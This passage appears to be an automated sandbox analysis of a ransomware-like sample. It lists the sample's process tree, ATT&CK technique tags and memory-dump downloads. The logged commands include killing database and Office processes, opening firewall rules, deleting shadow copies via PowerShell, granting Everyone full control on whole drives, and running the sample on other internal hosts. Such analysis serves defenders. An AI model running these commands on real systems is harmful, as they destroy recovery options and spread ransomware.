    PID:4392
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM encsvc.exe /F
    3⤵
    PID:5752
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    PID:4936
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM tmlisten.exe /F
    3⤵
    - Kills process with taskkill
    PID:4416
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM zoolz.exe /F
    3⤵
    PID:2760
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    PID:2016
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mysqld-opt.exe /F
    3⤵
    - Kills process with taskkill
    PID:4444
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM dbeng50.exe /F
    3⤵
    - Kills process with taskkill
    PID:5584
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM visio.exe /F
    3⤵
    - Kills process with taskkill
    PID:4492
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM excel.exe /F
    3⤵
    PID:5764
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM msftesql.exe /F
    3⤵
    PID:5104
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM winword.exe /F
    3⤵
    - Kills process with taskkill
    PID:4992
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" IM thunderbird.exe /F
    3⤵
    PID:5804
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM dbsnmp.exe /F
    3⤵
    PID:4844
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM thebat64.exe /F
    3⤵
    - Kills process with taskkill
    PID:1572
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM ocautoupds.exe /F
    3⤵
    - Kills process with taskkill
    PID:5720
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM sqlagent.exe /F
    3⤵
    PID:5524
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM CNTAoSMgr.exe /F
    3⤵
    PID:6036
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM powerpnt.exe /F
    3⤵
    PID:2580
- - C:\Windows\SysWOW64\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:3936
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mysqld-nt.exe /F
    3⤵
    PID:1612
- - C:\Windows\SysWOW64\netsh.exe
    "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
    3⤵
    PID:4584
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM ocssd.exe /F
    3⤵
    - Kills process with taskkill
    PID:6072
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM sqlbrowser.exe /F
    3⤵
    PID:420
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM wordpad.exe /F
    3⤵
    PID:1008
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM oracle.exe /F
    3⤵
    PID:5484
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM sqlservr.exe /F
    3⤵
    - Kills process with taskkill
    PID:2568
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4752
- - C:\Windows\SysWOW64\netsh.exe
    "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
    3⤵
    PID:756
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
    3⤵
    PID:3972
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "D:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:1472
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "Z:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4428
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5832
- - C:\Windows\SysWOW64\arp.exe
    "arp" -a
    3⤵
    PID:4456
- - C:\Windows\TEMP\awtiy2j3.exe
    "C:\Windows\TEMP\awtiy2j3.exe" \\10.10.0.10 -d -h -s -f -accepteula -nobanner -c "C:\Windows\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"
    3⤵
    PID:4660
- - C:\Windows\TEMP\awtiy2j3.exe
    "C:\Windows\TEMP\awtiy2j3.exe" \\10.10.0.33 -d -h -s -f -accepteula -nobanner -c "C:\Windows\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"
    3⤵
    PID:3580
- - C:\Windows\TEMP\awtiy2j3.exe
    "C:\Windows\TEMP\awtiy2j3.exe" \\10.10.0.38 -d -h -s -f -accepteula -nobanner -c "C:\Windows\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"
    3⤵
    PID:5364
- - C:\Windows\TEMP\awtiy2j3.exe
    "C:\Windows\TEMP\awtiy2j3.exe" \\10.10.0.14 -d -h -s -f -accepteula -nobanner -c "C:\Windows\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"
    3⤵
    PID:6120
- - C:\Windows\TEMP\awtiy2j3.exe
    "C:\Windows\TEMP\awtiy2j3.exe" \\10.10.0.36 -d -h -s -f -accepteula -nobanner -c "C:\Windows\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"
    3⤵
    PID:4164
- - C:\Windows\TEMP\awtiy2j3.exe
    "C:\Windows\TEMP\awtiy2j3.exe" \\10.10.0.41 -d -h -s -f -accepteula -nobanner -c "C:\Windows\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"
    3⤵
    PID:4900
- - C:\Windows\TEMP\awtiy2j3.exe
    "C:\Windows\TEMP\awtiy2j3.exe" \\10.10.0.11 -d -h -s -f -accepteula -nobanner -c "C:\Windows\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"
    3⤵
    PID:4988
- - C:\Windows\TEMP\awtiy2j3.exe
    "C:\Windows\TEMP\awtiy2j3.exe" \\10.10.0.15 -d -h -s -f -accepteula -nobanner -c "C:\Windows\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"
    3⤵
    PID:5280
- - C:\Windows\TEMP\awtiy2j3.exe
    "C:\Windows\TEMP\awtiy2j3.exe" \\10.10.0.16 -d -h -s -f -accepteula -nobanner -c "C:\Windows\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"
    3⤵
    PID:5136

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:4004

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
- Suspicious use of WriteProcessMemory
PID:4804

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File Deletion

T1107

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/64-278-0x00000247981C6000-0x00000247981C8000-memory.dmp

Filesize
8KB

Download
memory/64-205-0x00000247981C3000-0x00000247981C5000-memory.dmp

Filesize
8KB

Download
memory/64-203-0x00000247981C0000-0x00000247981C2000-memory.dmp

Filesize
8KB

Download
memory/64-299-0x00000247981C8000-0x00000247981C9000-memory.dmp

Filesize
4KB

Download
memory/376-277-0x000001A542DB6000-0x000001A542DB8000-memory.dmp

Filesize
8KB

Download
memory/376-207-0x000001A542DB3000-0x000001A542DB5000-memory.dmp

Filesize
8KB

Download
memory/376-291-0x000001A542DB8000-0x000001A542DB9000-memory.dmp

Filesize
4KB

Download
memory/376-204-0x000001A542DB0000-0x000001A542DB2000-memory.dmp

Filesize
8KB

Download
memory/636-191-0x0000019FF3BC3000-0x0000019FF3BC5000-memory.dmp

Filesize
8KB

Download
memory/636-260-0x0000019FF3BC6000-0x0000019FF3BC8000-memory.dmp

Filesize
8KB

Download
memory/636-190-0x0000019FF3BC0000-0x0000019FF3BC2000-memory.dmp

Filesize
8KB

Download
memory/636-284-0x0000019FF3BC8000-0x0000019FF3BC9000-memory.dmp

Filesize
4KB

Download
memory/2172-272-0x000001F443C56000-0x000001F443C58000-memory.dmp

Filesize
8KB

Download
memory/2172-193-0x000001F443C53000-0x000001F443C55000-memory.dmp

Filesize
8KB

Download
memory/2172-289-0x000001F443C58000-0x000001F443C59000-memory.dmp

Filesize
4KB

Download
memory/2172-181-0x000001F443C50000-0x000001F443C52000-memory.dmp

Filesize
8KB

Download
memory/2868-184-0x000001EB53D40000-0x000001EB53D42000-memory.dmp

Filesize
8KB

Download
memory/2868-194-0x000001EB53D43000-0x000001EB53D45000-memory.dmp

Filesize
8KB

Download
memory/2868-290-0x000001EB53D48000-0x000001EB53D49000-memory.dmp

Filesize
4KB

Download
memory/2868-275-0x000001EB53D46000-0x000001EB53D48000-memory.dmp

Filesize
8KB

Download
memory/3244-179-0x000001EEA6F20000-0x000001EEA6F22000-memory.dmp

Filesize
8KB

Download
memory/3244-187-0x000001EEA6F23000-0x000001EEA6F25000-memory.dmp

Filesize
8KB

Download
memory/3244-268-0x000001EEA6F26000-0x000001EEA6F28000-memory.dmp

Filesize
8KB

Download
memory/3244-287-0x000001EEA6F28000-0x000001EEA6F29000-memory.dmp

Filesize
4KB

Download
memory/3292-130-0x000001DC1D203000-0x000001DC1D205000-memory.dmp

Filesize
8KB

Download
memory/3292-122-0x000001DC1D430000-0x000001DC1D431000-memory.dmp

Filesize
4KB

Download
memory/3292-127-0x000001DC37A30000-0x000001DC37A31000-memory.dmp

Filesize
4KB

Download
memory/3292-129-0x000001DC1D200000-0x000001DC1D202000-memory.dmp

Filesize
8KB

Download
memory/3292-133-0x000001DC1D206000-0x000001DC1D208000-memory.dmp

Filesize
8KB

Download
memory/3560-114-0x0000000000010000-0x0000000000011000-memory.dmp

Filesize
4KB

Download
memory/3560-128-0x000000001ACD0000-0x000000001ACD2000-memory.dmp

Filesize
8KB

Download
memory/3960-198-0x000001C6B23C0000-0x000001C6B23C2000-memory.dmp

Filesize
8KB

Download
memory/3960-294-0x000001C6B23C8000-0x000001C6B23C9000-memory.dmp

Filesize
4KB

Download
memory/3960-202-0x000001C6B23C3000-0x000001C6B23C5000-memory.dmp

Filesize
8KB

Download
memory/3960-276-0x000001C6B23C6000-0x000001C6B23C8000-memory.dmp

Filesize
8KB

Download
memory/4180-208-0x00000172F7310000-0x00000172F7312000-memory.dmp

Filesize
8KB

Download
memory/4180-209-0x00000172F7313000-0x00000172F7315000-memory.dmp

Filesize
8KB

Download
memory/4180-279-0x00000172F7316000-0x00000172F7318000-memory.dmp

Filesize
8KB

Download
memory/4180-295-0x00000172F7318000-0x00000172F7319000-memory.dmp

Filesize
4KB

Download
memory/4296-280-0x0000017474746000-0x0000017474748000-memory.dmp

Filesize
8KB

Download
memory/4296-293-0x0000017474748000-0x0000017474749000-memory.dmp

Filesize
4KB

Download
memory/4296-218-0x0000017474740000-0x0000017474742000-memory.dmp

Filesize
8KB

Download
memory/4296-220-0x0000017474743000-0x0000017474745000-memory.dmp

Filesize
8KB

Download
memory/4440-222-0x0000015A257A0000-0x0000015A257A2000-memory.dmp

Filesize
8KB

Download
memory/4440-281-0x0000015A257A6000-0x0000015A257A8000-memory.dmp

Filesize
8KB

Download
memory/4440-292-0x0000015A257A8000-0x0000015A257A9000-memory.dmp

Filesize
4KB

Download
memory/4440-230-0x0000015A257A3000-0x0000015A257A5000-memory.dmp

Filesize
8KB

Download
memory/4552-226-0x000002102FE93000-0x000002102FE95000-memory.dmp

Filesize
8KB

Download
memory/4552-232-0x000002102FE90000-0x000002102FE92000-memory.dmp

Filesize
8KB

Download
memory/4552-282-0x000002102FE96000-0x000002102FE98000-memory.dmp

Filesize
8KB

Download
memory/4552-297-0x000002102FE98000-0x000002102FE99000-memory.dmp

Filesize
4KB

Download
memory/4684-228-0x000001EABDB73000-0x000001EABDB75000-memory.dmp

Filesize
8KB

Download
memory/4684-224-0x000001EABDB70000-0x000001EABDB72000-memory.dmp

Filesize
8KB

Download
memory/4684-296-0x000001EABDB78000-0x000001EABDB79000-memory.dmp

Filesize
4KB

Download
memory/4684-283-0x000001EABDB76000-0x000001EABDB78000-memory.dmp

Filesize
8KB

Download
memory/5420-311-0x000000001B9E0000-0x000000001B9E2000-memory.dmp

Filesize
8KB

Download
memory/5564-325-0x00000152DE790000-0x00000152DE792000-memory.dmp

Filesize
8KB

Download
memory/5608-313-0x000001B461780000-0x000001B461782000-memory.dmp

Filesize
8KB

Download
memory/5608-315-0x000001B461783000-0x000001B461785000-memory.dmp

Filesize
8KB

Download
memory/5608-318-0x000001B461785000-0x000001B461786000-memory.dmp

Filesize
4KB

Download
memory/5608-319-0x000001B461787000-0x000001B461789000-memory.dmp

Filesize
8KB

Download
memory/6008-312-0x000001DBB44C0000-0x000001DBB44C2000-memory.dmp

Filesize
8KB

Download
memory/6008-321-0x000001DBB44C7000-0x000001DBB44C9000-memory.dmp

Filesize
8KB

Download
memory/6008-314-0x000001DBB44C3000-0x000001DBB44C5000-memory.dmp

Filesize
8KB

Download
memory/6008-316-0x00007FF770850000-0x00007FF770851000-memory.dmp

Filesize
4KB

Download
memory/6008-320-0x000001DBB44C5000-0x000001DBB44C6000-memory.dmp

Filesize
4KB

Download